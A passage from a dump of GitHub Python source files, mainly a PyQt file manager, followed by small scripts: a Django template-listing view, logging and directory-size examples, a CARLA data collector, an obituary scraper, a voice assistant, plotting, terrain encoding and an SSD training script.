QtWidgets.QLabel(self.frame)\n self.delete_label.setGeometry(QtCore.QRect(160, 80, 51, 21))\n self.delete_label.setStyleSheet(\"font-size: 15px; font-family: forte;\")\n self.delete_label.setObjectName(\"delete_label\")\n\n self.cut_label = QtWidgets.QLabel(self.frame)\n self.cut_label.setGeometry(QtCore.QRect(270, 80, 31, 21))\n self.cut_label.setStyleSheet(\"font-size: 15px; font-family: forte;\")\n self.cut_label.setObjectName(\"cut_label\")\n \n self.copy_label = QtWidgets.QLabel(self.frame)\n self.copy_label.setGeometry(QtCore.QRect(360, 80, 51, 21))\n self.copy_label.setStyleSheet(\"font-size: 
15px; font-family: forte;\")\n self.copy_label.setObjectName(\"copy_label\")\n \n self.paste_label = QtWidgets.QLabel(self.frame)\n self.paste_label.setGeometry(QtCore.QRect(470, 80, 51, 21))\n self.paste_label.setStyleSheet(\"font-size: 15px; font-family: forte;\")\n self.paste_label.setObjectName(\"paste_label\")\n \n self.line = QtWidgets.QFrame(self.frame)\n self.line.setGeometry(QtCore.QRect(120, 20, 16, 71))\n self.line.setFrameShape(QtWidgets.QFrame.VLine)\n self.line.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line.setObjectName(\"line\")\n \n self.line_2 = QtWidgets.QFrame(self.frame)\n self.line_2.setGeometry(QtCore.QRect(220, 20, 16, 71))\n self.line_2.setFrameShape(QtWidgets.QFrame.VLine)\n self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line_2.setObjectName(\"line_2\")\n \n self.line_3 = QtWidgets.QFrame(self.frame)\n self.line_3.setGeometry(QtCore.QRect(320, 20, 16, 71))\n self.line_3.setFrameShape(QtWidgets.QFrame.VLine)\n self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line_3.setObjectName(\"line_3\")\n \n self.line_4 = QtWidgets.QFrame(self.frame)\n self.line_4.setGeometry(QtCore.QRect(430, 20, 16, 71))\n self.line_4.setFrameShape(QtWidgets.QFrame.VLine)\n self.line_4.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.line_4.setObjectName(\"line_4\")\n \n self.bottom_view = QtWidgets.QTextBrowser(self.centralwidget)\n self.bottom_view.setGeometry(QtCore.QRect(10, 840, 1091, 31))\n self.bottom_view.setObjectName(\"bottom_view\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.bottom_view.setText(\"Developed by AKASH KUMAR SINGH\")\n self.bottom_view.setStyleSheet(\"font-size: 15px; font-family: Lucida Calligraphy; color: red;\")\n self.bottom_view.setAlignment(Qt.AlignCenter)\n self.bottom_view.verticalScrollBar().hide()\n\n self.hideButton = QtWidgets.QPushButton(self.centralwidget)\n self.hideButton.setGeometry(QtCore.QRect(1010, 850, 61, 20))\n self.hideButton.setObjectName(\"hideButton\")\n self.hideButton.setStyleSheet(\"border: none; background: white\")\n self.hideButton.clicked.connect(self.enableHidden)\n \n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n self.actions()\n self.mainArea.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.mainArea.customContextMenuRequested.connect(self.context_menu)\n self.function()\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"File Manager\", \"File Manager\"))\n self.back_button.setText(_translate(\"MainWindow\", \"...\"))\n self.next_button.setText(_translate(\"MainWindow\", \"...\"))\n self.path_label.setText(_translate(\"MainWindow\", \"Path\"))\n self.prev_button.setText(_translate(\"MainWindow\", \"...\"))\n self.newFolder_label.setText(_translate(\"MainWindow\", \"New Folder\"))\n self.delete_label.setText(_translate(\"MainWindow\", \"Delete\"))\n self.cut_label.setText(_translate(\"MainWindow\", \"Cut\"))\n self.copy_label.setText(_translate(\"MainWindow\", \"Copy\"))\n self.paste_label.setText(_translate(\"MainWindow\", \"Paste\"))\n\n\n def function(self):\n self.mainModel = QDirModel()\n self.mainModel.setReadOnly(True)\n self.mainModel.setSorting(QDir.DirsFirst | QDir.IgnoreCase | QDir.Name)\n self.mainArea.setModel(self.mainModel)\n self.mainArea.setColumnWidth(0, 300)\n self.mainArea.verticalHeader().hide()\n\n 
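# left pane: a live filesystem tree limited to directories and drives\n        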
self.dirModel = QFileSystemModel()\n        self.dirModel.setReadOnly(True)\n        self.dirModel.setRootPath(QDir.rootPath())\n        self.dirModel.setFilter(QDir.NoDotAndDotDot | QDir.AllDirs | QDir.Drives)\n        self.leftPane.setModel(self.dirModel)\n        self.leftPane.hideColumn(1)\n        self.leftPane.hideColumn(2)\n        self.leftPane.hideColumn(3)\n        self.leftPane.setHeaderHidden(True)\n\n        # Prerequisites for the navigation history and other stateful actions.\n        self.prev_path = []\n        self.curr = -1\n        self.temp = \"\"\n        self.cut_flag = False\n        self.darkMode_flag = False\n        self.hiddenEnabled = False\n\n        self.leftPane.clicked.connect(self.left_to_main)\n        self.mainArea.doubleClicked.connect(self.double_main)\n\n    def path_left(self):\n        self.index = self.leftPane.currentIndex()\n        self.path_address = self.dirModel.filePath(self.index)\n        try:\n            if self.path_address != self.prev_path[self.curr]:\n                self.prev_path.append(self.path_address)\n                self.curr += 1\n        except:\n            self.prev_path.append(self.path_address)\n            self.curr += 1\n\n    def path_main(self):\n        self.index = self.mainArea.currentIndex()\n        self.path_address = self.mainModel.filePath(self.index)\n        try:\n            if os.path.isdir(self.path_address) and (self.path_address != self.prev_path[self.curr]):\n                self.prev_path.append(self.path_address)\n                self.curr += 1\n        except:\n            self.prev_path.append(self.path_address)\n            self.curr += 1\n\n    def left_to_main(self):\n        self.path_left()\n        self.prev_path.insert(self.curr + 1, self.prev_path[-1])\n        self.prev_path = self.prev_path[:self.curr + 1]\n        self.mainArea.setRootIndex(self.mainModel.index(self.path_address))\n        self.mainArea.setSortingEnabled(True)\n        self.path.setText(self.path_address.replace(\"/\", \"\\\\\"))\n\n    def double_main(self):\n        self.path_main()\n        self.prev_path.insert(self.curr, self.prev_path[-1])\n        self.prev_path = self.prev_path[:self.curr + 1]\n        if os.path.isdir(self.path_address):\n            self.mainArea.setRootIndex(self.mainModel.index(self.path_address))\n            self.path.setText(self.path_address.replace(\"/\", \"\\\\\"))\n            self.leftPane.setCurrentIndex(self.dirModel.index(self.path_address))\n            self.leftPane.setFocus()\n        else:\n            os.startfile(self.path_address, \"open\")\n\n    def actions(self):\n        self.Open = QAction(\"Open\", triggered = self.double_main)\n        self.mainArea.addAction(self.Open)\n\n        self.Create = QAction(\"New Folder\", triggered = self.newFolder)\n        self.Create.setShortcut(QKeySequence(\"Ctrl+n\"))\n        self.mainArea.addAction(self.Create)\n\n        self.Cut = QAction(\"Cut\", triggered = self.cut)\n        self.Cut.setShortcut(QKeySequence(\"Ctrl+x\"))\n        self.mainArea.addAction(self.Cut)\n\n        self.Copy = QAction(\"Copy\", triggered = self.copy)\n        self.Copy.setShortcut(QKeySequence(\"Ctrl+c\"))\n        self.mainArea.addAction(self.Copy)\n\n        self.Paste = QAction(\"Paste\", triggered = self.paste)\n        self.Paste.setShortcut(QKeySequence(\"Ctrl+v\"))\n        self.mainArea.addAction(self.Paste)\n\n        self.Rename = QAction(\"Rename\", triggered = self.rename)\n        self.Rename.setShortcut(QKeySequence(Qt.Key_F2))\n        self.mainArea.addAction(self.Rename)\n\n        self.Delete = QAction(\"Delete\", triggered = self.deleteFileFolder)\n        self.Delete.setShortcut(QKeySequence(\"Del\"))\n        self.mainArea.addAction(self.Delete)\n\n\n    def context_menu(self):\n        menu = QMenu(self.mainArea)\n        menu.addAction(self.Open)\n        menu.addAction(self.Create)\n        menu.addAction(self.Rename)\n        menu.addAction(self.Cut)\n        menu.addAction(self.Copy)\n        menu.addAction(self.Paste)\n        menu.addAction(self.Delete)\n\n        cursor = QCursor()\n        menu.exec_(cursor.pos())\n\n    def refresh_mainArea(self):\n        self.mainModel.refresh(self.index)\n        
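# point the table back at the current directory after refreshing the model\n        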
self.mainArea.setRootIndex(self.mainModel.index(self.path_address))\n\n\n    def newFolder(self):\n        self.path_left()\n        dlg = QInputDialog(self.mainArea)\n        foldername, ok = dlg.getText(self.mainArea, 'Folder Name', \"Folder Name:\", QLineEdit.Normal, \"\", Qt.Dialog)\n        if ok:\n            success = QDir(self.path_address).mkdir(foldername)\n            self.refresh_mainArea()\n\n    def deleteFileFolder(self):\n        self.path_main()\n        try:\n            if os.path.isdir(self.path_address):\n                shutil.rmtree(self.path_address, ignore_errors = True)\n            else:\n                os.remove(self.path_address)\n            self.refresh_mainArea()\n        except:\n            return\n\n        self.path_left()\n        self.refresh_mainArea()\n\n    def move_prev(self):\n        try:\n            self.path_address = self.path_address[:(len(self.path_address) - len(os.path.basename(self.path_address)) - 1)]\n        except:\n            return\n        self.mainArea.setRootIndex(self.mainModel.index(self.path_address))\n        if self.path_address.isalpha():\n            self.path.setText(\"\")\n            return\n        self.path.setText(self.path_address)\n        self.leftPane.setCurrentIndex(self.dirModel.index(self.path_address))\n        self.leftPane.setFocus()\n\n    def go_back(self):\n        if self.curr <= 0:\n            self.curr = 0\n            return\n        self.curr -= 1\n        self.path_address = self.prev_path[self.curr]\n        self.mainArea.setRootIndex(self.mainModel.index(self.path_address))\n        self.path.setText(self.path_address.replace(\"/\", \"\\\\\"))\n        self.leftPane.setCurrentIndex(self.dirModel.index(self.path_address))\n        self.leftPane.setFocus()\n\n    def go_next(self):\n        if self.curr >= len(self.prev_path) - 1:\n            self.curr = len(self.prev_path) - 1\n            return\n        if self.curr < 0:\n            self.curr = 0\n        self.curr += 1\n        self.path_address = self.prev_path[self.curr]\n        self.mainArea.setRootIndex(self.mainModel.index(self.path_address))\n        self.path.setText(self.path_address.replace(\"/\", \"\\\\\"))\n        self.leftPane.setCurrentIndex(self.dirModel.index(self.path_address))\n        self.leftPane.setFocus()\n\n    def copy(self):\n        self.path_main()\n        self.temp = self.path_address\n\n    def paste(self):\n        try:\n            if self.cut_flag:\n                self.cutPaste()\n                return\n            self.path_left()\n            if os.path.isdir(self.temp):\n                shutil.copytree(self.temp, self.path_address + \"/\" + os.path.basename(self.temp))\n                self.refresh_mainArea()\n                return\n            shutil.copy2(self.temp, self.path_address)\n            self.refresh_mainArea()\n        except:\n            return\n\n    def cut(self):\n        if os.path.isdir(self.temp):\n            shutil.move(self.temp, self.path_address + \"/\" + os.path.basename(self.temp))\n            self.refresh_mainArea()\n            return\n        self.path_main()\n        self.temp = self.path_address\n        self.cut_flag = True\n\n    def cutPaste(self):\n        self.path_left()\n        shutil.move(self.temp, self.path_address)\n        self.refresh_mainArea()\n        self.cut_flag = False\n\n    def rename(self):\n        self.path_main()\n        dlg = QInputDialog(self.mainArea)\n        newname, ok = dlg.getText(self.mainArea, 'Rename', \"New Name:\", QLineEdit.Normal, \"\", Qt.Dialog)\n        if ok:\n            l = len(os.path.basename(self.path_address))\n            # strip the old basename ([:-l], not [:l]) before appending the new name\n            os.rename(self.path_address, (self.path_address[:-l] + newname))\n            self.path_address = self.path_address[:-l]\n            self.index = self.mainModel.index(self.path_address)\n            self.refresh_mainArea()\n\n    def darkMode(self):\n        if self.darkMode_flag:\n            black = \"white\"\n            white = \"black\"\n            self.darkMode_flag = False\n            icon8 = QtGui.QIcon()\n            icon8.addPixmap(QtGui.QPixmap(\":/icons/icons8-moon-and-stars-50.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n            self.dark_Button.setIcon(icon8)\n            self.mainArea.horizontalHeader().show()\n        else:\n            black = \"#212120\"\n            white = \"white\"\n            self.darkMode_flag = True\n            icon8 = QtGui.QIcon()\n            
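# dark mode is now enabled, so show the sun icon for switching back to light mode\n            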
icon8.addPixmap(QtGui.QPixmap(\":/icons/icons8-sun-80.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n            self.dark_Button.setIcon(icon8)\n            self.mainArea.horizontalHeader().hide()\n        \n        MainWindow.setStyleSheet(f\"background: {black};\")\n        self.frame.setStyleSheet(f\"background: {black};\")\n        self.path.setStyleSheet(f\"color: {white};\")\n        self.path_label.setStyleSheet(f\"font-size: 15px; font-family: Bahnschrift SemiBold; color: {white};\")\n        self.cut_label.setStyleSheet(f\"font-size: 15px; font-family: forte; color: {white}\")\n        self.copy_label.setStyleSheet(f\"font-size: 15px; font-family: forte; color: {white}\")\n        self.paste_label.setStyleSheet(f\"font-size: 15px; font-family: forte; color: {white}\")\n        self.delete_label.setStyleSheet(f\"font-size: 15px; font-family: forte; color: {white}\")\n        self.newFolder_label.setStyleSheet(f\"font-size: 15px; font-family: forte; color: {white}\")\n        self.leftPane.setStyleSheet(f\"background: {black}; color: {white};\")\n        self.mainArea.setStyleSheet(f\"background: {black}; color: {white};\")\n        self.hideButton.setStyleSheet(f\"background: {black}; border: none\")\n\n    def enableHidden(self):\n        if self.hiddenEnabled == False:\n            self.mainModel.setFilter(QDir.NoDotAndDotDot | QDir.Hidden | QDir.AllDirs | QDir.Files)\n            self.dirModel.setFilter(QDir.NoDotAndDotDot | QDir.Hidden | QDir.AllDirs)\n            self.hiddenEnabled = True\n        else:\n            self.mainModel.setFilter(QDir.NoDotAndDotDot | QDir.AllDirs | QDir.Files)\n            self.dirModel.setFilter(QDir.NoDotAndDotDot | QDir.AllDirs)\n            self.hiddenEnabled = False\n\n\nimport images\n\n\nif __name__ == \"__main__\":\n    import sys\n    app = QtWidgets.QApplication(sys.argv)\n    MainWindow = QtWidgets.QMainWindow()\n    ui = Ui_MainWindow()\n    ui.setupUi(MainWindow)\n    MainWindow.show()\n    sys.exit(app.exec_())\n","repo_name":"THEAKS1/fileManager","sub_path":"file_explo.py","file_name":"file_explo.py","file_ext":"py","file_size_in_byte":22005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10968903513","text":"import os\nimport os.path\n\nfrom django.apps import apps\nfrom django.shortcuts import render\nfrom django.views import View\n\n\nclass DirsView(View):\n    def get(self, request, path: str, *args, **kwargs):\n        parts = path.split(\"/\")\n        app = \".\".join(parts[:-1])\n        dir_name = parts[-1]\n        app_config = next(filter(lambda c: c.name == app, apps.app_configs.values()))\n        app_root = app_config.path\n        template_dir = os.path.join(app_root, dir_name)\n\n        template_list = []\n        for base_dir, dirnames, filenames in os.walk(template_dir):\n            for filename in filenames:\n                template_list.append(os.path.join(base_dir, filename))\n\n        return render(request, 'templates_debugger/dirs.html', context={\n            'files': template_list\n        })\n","repo_name":"safecube/django-templates-debugger","sub_path":"templates_debugger/views/dirs.py","file_name":"dirs.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39483177894","text":"\"\"\" https://docs.python.org/3/howto/logging.html#logging-advanced-tutorial \"\"\"\nimport logging.config\nimport logging\nfrom pathlib import Path\n\nfrom yaml import load, Loader  # python -m pip install pyyaml\n\n\nfrom extra_module import hello_world\nfrom libs import some_module\n\n\n# logging filters can be used to filter based on _content_, not (only) level\nLOGGING_CONFIG = Path(\"logging.yaml\")\n# LOGGING_CONFIG = 
Path(\"logging_2.yaml\")\n\nlogging.config.dictConfig(\n config=load(LOGGING_CONFIG.read_text(), Loader=Loader))\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef log_stuff():\n\n logger.debug(\"Main funktiossa debug-viesti\")\n logger.info(\"Main funktiossa info-viesti\")\n logger.warning(\"Main funktiossa warning-viesti\")\n logger.error(\"Main funktiossa error-viesti\")\n logger.critical(\"Main funktiossa critical-viesti\")\n\n hello_world()\n some_module.kewl_stuff()\n\n try:\n 1/0\n except Exception:\n logger.error(\"you did stupid\")\n\n\nif __name__ == '__main__':\n log_stuff()\n","repo_name":"PythonVinkit/youtube-sarja","sub_path":"03_logging/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"40364055934","text":"# %%\n# Name : Gaurav Sanjeev Taneja\n# ID : 1001955801\n# Python version: 3.10.4\n# OS: Windiows 11\n\nimport os # this import is good practice when code is deployed on different OS. The import is mandatory to use its in built function for filesystem. \n# below is the function definition where we expect the path of the directory as parameter.\ndef getSize(path):\n sum = 0 # This variable is used to store and in calculation of the size\n for element in os.scandir(path): # This loop is mandatory to iterate over the list of items in the directory. Scandir gives list of all the element that are in the folder.\n if element.is_file(): # Condition to check wheteher the element is a file\n sum += element.stat().st_size # if element is the file then get the size by using inbuilt fucntion stat which uses class stat_result which helps in getting the size of the file \n elif element.is_dir(): # check if element is directory\n sum+= getSize(element.path) # If element is the directory then the update the path to iterate over all the elements of that directory to get size\n return sum # Returns the size of the direcotry given in the parameter \ntotalSize= getSize(os.getcwd()) # Function call for the calculating the size of the directory in bytes\nprint(\"The Size of the directory in bytes:\",totalSize) \n\n\n","repo_name":"Gaurav2416/Programming-language-Concepts","sub_path":"Assingments/Lab1/gst5801_lab01.py","file_name":"gst5801_lab01.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11951460944","text":"import argparse\nimport pathlib\n\nimport numpy as np\nimport tqdm\nimport carla\nimport cv2\n\nfrom PIL import Image\n\nfrom .envs.carla_env import CarlaEnv\nfrom .utils.common import visualize_birdview, colorize_segmentation\n\n\ndef save(save_dir, observations, step, debug):\n rgb = observations['rgb']\n birdview = observations['birdview']\n segmentation = observations['segmentation']\n\n pos = observations['position']\n ori = observations['orientation']\n measurements = np.float32([pos[0], pos[1], pos[2], np.arctan2(ori[1], ori[0])])\n\n np.save(save_dir / ('measurements_%04d' % step), measurements)\n np.save(save_dir / ('birdview_%04d' % step), birdview)\n\n Image.fromarray(rgb).save(save_dir / ('image_%04d.png' % step))\n Image.fromarray(segmentation).save(save_dir / ('segmentation_%04d.png' % step))\n\n if debug:\n cv2.imshow('rgb', cv2.cvtColor(rgb[:, :, :3], cv2.COLOR_BGR2RGB))\n cv2.imshow('birdview', cv2.cvtColor(visualize_birdview(birdview), cv2.COLOR_BGR2RGB))\n cv2.imshow('segmentation', cv2.cvtColor(colorize_segmentation(segmentation), 
cv2.COLOR_BGR2RGB))\n cv2.waitKey(1)\n\n\ndef collect_episode(env, save_dir, episode_length, frame_skip, debug):\n save_dir.mkdir()\n\n for step in tqdm.tqdm(range(episode_length)):\n spectator = env._world.get_spectator()\n spectator.set_transform(\n carla.Transform(\n env._player.get_location() + carla.Location(z=75),\n carla.Rotation(pitch=-90)))\n\n observations = env.step()\n\n if step % frame_skip == 0:\n save(save_dir, observations, step // frame_skip, debug)\n\n\ndef main(config):\n np.random.seed(0)\n\n with CarlaEnv(town='Town06', port=config.port) as env:\n for episode in range(config.episodes):\n env.reset(\n n_vehicles=np.random.choice([0, 50, 100]),\n n_pedestrians=0, seed=episode)\n env._player.set_autopilot(True)\n\n collect_episode(\n env,\n config.save_dir / ('%03d' % episode),\n config.episode_length, config.frame_skip, config.debug)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--port', type=int, default=2000)\n parser.add_argument('--save_dir', type=pathlib.Path, default='data')\n parser.add_argument('--episodes', type=int, default=10)\n parser.add_argument('--episode_length', type=int, default=1000)\n parser.add_argument('--frame_skip', type=int, default=10)\n parser.add_argument('--debug', action='store_true', default=False)\n\n main(parser.parse_args())\n","repo_name":"bradyz/task-distillation","sub_path":"policy_transfer/collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"35"} +{"seq_id":"13077777402","text":"import requests,bs4\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef death_search(name,pren):\r\n try:\r\n url = \"https://www.avis-de-deces.net/avis-de-deces/?nomprenomdefunt={}\".format(name)\r\n r = requests.get(url)\r\n page = r.content\r\n features = \"html.parser\"\r\n soup = BeautifulSoup(page, features)\r\n\r\n names = soup.find_all('h2')\r\n villes = soup.find_all('span',{'class':'ville'})\r\n ages = soup.find_all('p',{'class':'list-item__adress'})\r\n links = soup.find_all('a',{'class':'list__link'})\r\n\r\n profile_list = []\r\n\r\n for i in range(len(names)):\r\n try:\r\n name = names[i].text.strip()\r\n loc = villes[i].text.strip()\r\n age = ages[i].text.strip()\r\n link = links[i]\r\n link = (str(link).split('\" title=\"')[0])\r\n link = str(link).replace('
    /', deleteNotepost, name=\"deleteNotepost\"),\n path('login/', login, name=\"login\"),\n path('register/', register, name=\"register\"),\n path('logout/', logout, name=\"logout\"),\n]\n","repo_name":"SadnanTunning/notepost_maker","sub_path":"notepostapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6457299956","text":"import numpy as np\nimport visual_map\nimport os, re, sys\nimport time, math, string\nfrom matplotlib import pyplot as plt\n\nprint('in python script')\n\nf = open('filter_list.tmp')\n\nnum_lines = sum(1 for line in open('filter_list.tmp'))\n\ninfo_log = np.zeros(11664)\n\n# reading input file line by line to get ID of cell and spot number\nfor line in xrange(0, num_lines):\n\n line_content = f.readline()\n\n line_content = line_content.split()\n\n filename = line_content[0]\n\n i = int(filename[-9:-4])\n\n if sys.argv[1] == '-s':\n info_log[i] = int(line_content[1])\n\n if sys.argv[1] == '-i':\n info_log[i] = line_content[1]\n\n#for i in xrange(0,num_lines):\n# print(spot_log[i])\n\nx_list, y_list, z_list = [], [], []\n# [addr] = i, [i] = addr \ncollect_addr_dict, collect_ordr_dict = visual_map.collect_dicts()\n#normal_addr_dict, normal_ordr_dict = visual_map.normal_dicts()\nfid_list, corners_list = visual_map.index11664_fiducials()\n\nfor j in range(0, 11664):\n addr = collect_ordr_dict[j]\n #addr = normal_ordr_dict[j]\n x, y = visual_map.get_xy(addr)\n \n if(sys.argv[1] == '-s'):\n z = info_log[j]\n \"\"\"\"\n if(info_log[j] > 50):\n z = 100\n else:\n z = 0\n \"\"\"\n\n if(sys.argv[1] == '-i'):\n if(info_log[j] > 0.1):\n z = 100\n else:\n z = 0\n\n\n x_list.append(float(x))\n y_list.append(float(y))\n z_list.append(float(z))\n\nX = np.array(x_list)\nY = np.array(y_list)\nZ = np.array(z_list)\nxr = X.ravel()\nyr = Y.ravel()\nzr = Z.ravel()\n\nprint('before plot')\n\nfig = plt.figure(num=None, figsize=(9,9), facecolor='0.6', edgecolor='k')\nfig.subplots_adjust(left=0.03,bottom=0.03,right=0.97,top=0.97,wspace=0,hspace=0)\nax1 = fig.add_subplot(111, aspect='equal', axisbg='0.7')\nax1.scatter(xr, yr, c=zr, s=16, alpha=1, marker='s', linewidth=0.1)#,cmap='PuOr')\nax1.set_xticks([2.2*x for x in range(11)])\nax1.set_yticks([2.5*x for x in range(11)])\nax1.set_xlim(xr.min()-0.2, xr.max()+0.2)\nax1.set_ylim(yr.min()-0.2, yr.max()+0.2)\nax1.invert_yaxis()\n\nif(sys.argv[1] == '-s'):\n plt.savefig('spot_plot.png', dpi=600, bbox_inches='tight', pad_inches=0.05)\n\nif(sys.argv[1] == '-i'):\n plt.savefig('index_plot.png', dpi=600, bbox_inches='tight', pad_inches=0.05)\n\nprint('after plot')\n\nnp.save('info_log.npy', info_log)\n","repo_name":"Laurence-Cullen/chip_scripts","sub_path":"misc/spot_map.py","file_name":"spot_map.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"20724395639","text":"import pyttsx3\r\nimport datetime\r\nimport speech_recognition as sr\r\nimport webbrowser as wb\r\nnghe=pyttsx3.init()\r\nvoice=nghe.getProperty('voices')\r\nnghe.setProperty('voice',voice[1].id)\r\ndef speak(audio):\r\n print('Thông tuệ vương.' 
+ audio)\r\n    nghe.say(audio)\r\n    nghe.runAndWait()\r\nspeak(\"Chào Tuấn Anh \")\r\ndef time():\r\n    Time=datetime.datetime.now().strftime(\"%I:%M:%p\")\r\n    speak(Time)\r\ndef welcome():\r\n    hour=datetime.datetime.now().hour\r\n    if hour >=6 and hour <12:\r\n        speak(\"Buổi sáng tốt lành thưa ông chủ\")\r\n    elif hour >=12 and hour <18:\r\n        speak(\"Buổi trưa tốt lành thưa ông chủ\")\r\n    elif hour >=18 and hour <24:\r\n        speak(\"Buổi tối tốt lành thưa ông chủ\")\r\n    speak('Ông chủ cần giúp gì')\r\ndef command():\r\n    c=sr.Recognizer()\r\n    with sr.Microphone() as soure:\r\n        c.pause_threshold=2\r\n        audio=c.listen(soure)\r\n    try:\r\n        query=c.recognize_google(audio,language='vi')\r\n        print(\"Tuấn Anh :\" + query)\r\n    except sr.UnknownValueError:\r\n        print(\"Bạn muốn tìm gì?\")\r\n        query=str(input('Có phải bạn muốn tìm gì không?'))\r\n    return query\r\n    \r\nif __name__ ==\"__main__\":\r\n    welcome()\r\n    while True:\r\n        query=command().lower()\r\n        if \"google\" in query:\r\n            speak(\"Tuấn Anh cần tìm gì?\")\r\n            search=command().lower()\r\n            url=f\"https://www.google.com/search?q={search}\"\r\n            wb.get().open(url)\r\n            speak(f'Here is your {search} on google')\r\n        if \"youtube\" in query:\r\n            speak(\"Tuấn Anh cần tìm gì?\")\r\n            search=command().lower()\r\n            url=f\"https://www.youtube.com/search?q={search}\"\r\n            wb.get().open(url)\r\n            speak(f'Here is your {search} on youtube')\r\n        elif \"time\" in query:\r\n            time()\r\n        if \"facebook\" in query:\r\n            speak(\"Tuấn Anh cần tìm gì?\")\r\n            search=command().lower()\r\n            url=f\"https://www.facebook.com/?q={search}\"\r\n            wb.get().open(url)\r\n            speak(f'Here is your {search} on facebook')\r\n","repo_name":"tuananh998/Tro-li-ao-AI-python","sub_path":"nghe.py","file_name":"nghe.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"7626339064","text":"def ae_count(str):\n    hash = {}\n\n    arr_from_str = list(str)\n    for char in arr_from_str:\n        if (char == 'a' or char == 'e') and (char not in hash.keys()):\n            hash.update({char: 1})\n        elif char == 'a' or char == 'e':\n            hash[char] += 1\n\n    return hash\n\nprint(ae_count(\"everyone can program!\"))\nprint(ae_count(\"keyboard\"))\nprint(ae_count('habia una vez una iguana'))\n","repo_name":"dnewbie25/App-Academy-Python-Version","sub_path":"Intro to programming with Python/Dictionaries Exercises/AE_count.py","file_name":"AE_count.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"31487209345","text":"# coding=utf-8\nfrom __future__ import absolute_import, division, print_function\n\nimport numpy as np\n\nfrom marblecutter import PixelCollection\nfrom marblecutter.transformations.utils import TransformationBase\n\n\nclass Terrarium(TransformationBase):\n    def transform(self, pixels):\n        data, bounds, _ = pixels\n        (count, height, width) = data.shape\n\n        if count != 1:\n            raise Exception(\"Can't encode heights from multiple bands\")\n\n        # we want the output to be 3-channels R, G, B with:\n        # uheight = height + 32768.0\n        # R = int(height) / 256\n        # G = int(height) % 256\n        # B = int(frac(height) * 256)\n        # For nodata, we'll use R=0, which corresponds to height < 32,513 which\n        # is lower than any depth on Earth.\n\n
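        # (hedged worked example, not in the original) encoding Everest, height = 8848.0 m:\n        #   uheight = 8848.0 + 32768.0 = 41616.0 -> R = 162, G = 144, B = 0\n        #   decoding: (162 * 256 + 144 + 0 / 256) - 32768.0 = 8848.0, recovering the height\n        pixels = 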
data[0]\n        pixels.fill_value = 0\n\n        # transform to uheight, clamping the range\n        pixels += 32768.0\n        np.clip(pixels, 0.0, 65535.0, out=pixels)\n\n        r = (pixels / 256).astype(np.uint8)\n        g = (pixels % 256).astype(np.uint8)\n        b = ((pixels * 256) % 256).astype(np.uint8)\n\n        return PixelCollection(np.dstack((r, g, b)), bounds), 'RGB'\n","repo_name":"mojodna/marblecutter-tilezen","sub_path":"tilezen/transformations/terrarium.py","file_name":"terrarium.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"}
+{"seq_id":"30907202222","text":"import argparse\nimport torch\nimport time\nimport logging\nfrom solver.trainer import do_train_one_epoch, do_evaluate\nfrom solver import build_LRscheduler\nfrom solver import build_optimizer\nfrom data.dataset import make_dataLoader\nfrom utils.checkpoint import CheckPoint\nfrom ssd_detector import *\n\nimport utils.setting_dict\n\ndef train(setting_dict):\n    logging.basicConfig(level=logging.INFO)\n    logger = logging.getLogger(\"SSD.trainer\")\n    logger.setLevel(logging.INFO)\n    logger.info(\"start training....\")\n\n    model = SSDdetector(setting_dict=setting_dict[\"model\"])\n\n    ## if you want to fine tune the pretrained model\n    ## just change \"the path of pretrained model\" to your model\n    if setting_dict[\"fine_tune\"] :\n        checkpoint = torch.load(setting_dict[\"pretrained_model\"], map_location=torch.device(\"cpu\"))\n        state = checkpoint.pop(\"model\")  # pop once; the state dict is reused for both loads below\n        model_dict = {}\n        for key, value in state.items():\n            if \"backbone\" in key:\n                model_dict[key.replace(\"backbone.\",\"\")] = value\n        model.backbone.load_state_dict(model_dict)\n        model.load_state_dict(state)\n\n        for para in model.backbone.parameters() :\n            para.requires_grad = False\n\n\n    device = torch.device(setting_dict[\"device\"])\n    model.to(device)\n    lr = setting_dict[\"solver\"][\"LR\"]\n\n\n    ## if you want to fine tune the pretrained model\n    ## just change model to model.boxhead\n    optimizer = build_optimizer(setting_dict[\"solver\"][\"optimizer\"], model, lr)\n    scheduler = 